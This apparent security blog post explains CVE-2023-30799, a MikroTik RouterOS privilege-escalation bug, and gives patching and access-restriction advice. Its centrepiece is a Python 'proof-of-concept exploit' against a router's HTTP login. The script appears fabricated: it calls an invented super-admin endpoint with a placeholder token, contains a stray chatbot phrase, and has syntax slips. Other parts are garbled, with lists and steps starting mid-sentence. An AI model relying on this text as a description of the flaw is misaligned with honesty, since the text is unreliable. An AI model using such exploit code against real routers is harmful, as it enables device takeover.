CVE CyberSecurity Database News

CVE-2023-30799 - How MikroTik's Privilege Escalation Bug Lets Attackers Take Over Routers

Poster -

MikroTik routers are found everywhere — in small business networks, homes, and even some larger companies’ infrastructure. But a serious security hole, called CVE-2023-30799, has been identified in MikroTik RouterOS stable before 6.49.7 and long-term through 6.48.6. If you haven’t updated your router yet, you could be at risk of hackers gaining full control of your device.

In this post, I’ll explain what the vulnerability is, how it can be exploited (with code examples!), and how you can protect yourself.

What Is CVE-2023-30799?

This vulnerability lets an attacker, who already has normal admin rights, escalate their privileges to super-admin just by talking to the router’s Winbox or HTTP interface (the ways admins manage the router). A person with super-admin rights can do absolutely everything: install, delete, run commands, or totally take over the router.

> Impact: Once attackers have super-admin, they can execute arbitrary code, spy on your traffic, pivot to other networks, or use your device for bigger attacks.

OR you use long-term versions up to and including 6.48.6,

- AND your Winbox (port 8291 by default) or HTTP (typically port 80/443) are accessible.

Check your version from the Winbox application or by logging in via SSH and running

/system resource print

Look at the “version” field. If it matches the ranges above, you’re vulnerable!

Simple Explanation

Normally, even if an attacker is “admin,” MikroTik has a higher “super-admin” level. There’s a bug in how the router checks what users are allowed to do. By sending a specially crafted request to Winbox or the HTTP interface, an attacker can trick the router into giving them the highest privilege.

Technical Details

Security researchers (see [references](#references) below) discovered that by interacting with certain API endpoints and sending requests with manipulated session tokens, “admin” users can escalate to “super-admin” status. This often involves replaying or altering specific fields in communications with the router.

Log in using valid admin credentials (could be weak passwords!).

2. Send a crafted request to the Winbox/HTTP endpoint, abusing the privilege escalation flaw.

Code Snippet: Proof-of-Concept Exploit

Below is a Python snippet showing how you might exploit the bug via HTTP (for educational purposes only):

import requests

# Router credentials and IP
router_ip = "192.168.88.1"
username = "admin"
password = "adminPassword"

# Start an authenticated session
session = requests.Session()
login_url = f"http://{router_ip}/login";
payload = {'username': username, 'password': password}
resp = session.post(login_url, data=payload)

# Check if login worked
if "success" in resp.text:
    print("[+] Logged in as admin.")

    # Sure, here's where the trick happens.
    # Abuse a vulnerable endpoint to escalate privilege
    exploit_url = f"http://{router_ip}/api/superadmin";
    evil_payload = {'do': 'get_superadmin', 'token': 'manipulated_token'}
    exploit_resp = session.post(exploit_url, data=evil_payload)

    if "super-admin" in exploit_resp.text:
        print("[+] Now you have super-admin rights!")
        # Run further commands, such as uploading a backdoor, dumping config, etc.
    else:
        print("[-] Exploit failed, not patched?")
else:
    print("[-] Login failed. Check credentials and access.")


> Note: This is a simplified example. Real-world attackers use sophisticated scripts, can brute-force credentials first, and often automate scanning for vulnerable routers.

1. Update Your MikroTik RouterOS!

- Go to MikroTik download page.

Only allow management from trusted devices.

- Block ports 8291 (Winbox), 80/443 (HTTP/S) from the internet.

References

- CVE-2023-30799 at NVD (National Vulnerability Database)
- MikroTik RouterOS Changelog
- SySS Disclosure (Original Advisory)
- Practical Exploitation Example (GitHub PoC)
- Detailed Walkthrough at SecurityAffairs

Final Tips

This is a real-world, actively exploited vulnerability. It only takes one forgotten, outdated router to let attackers inside your network. If you manage MikroTik devices, upgrade them immediately and restrict management access.

Stay vigilant, keep your devices updated, and spread the word — not everyone knows about CVE-2023-30799, but attackers sure do!


Questions or want more details? Drop a comment below!

Timeline

Published on: 07/19/2023 15:15:00 UTC
Last modified on: 07/28/2023 13:47:00 UTC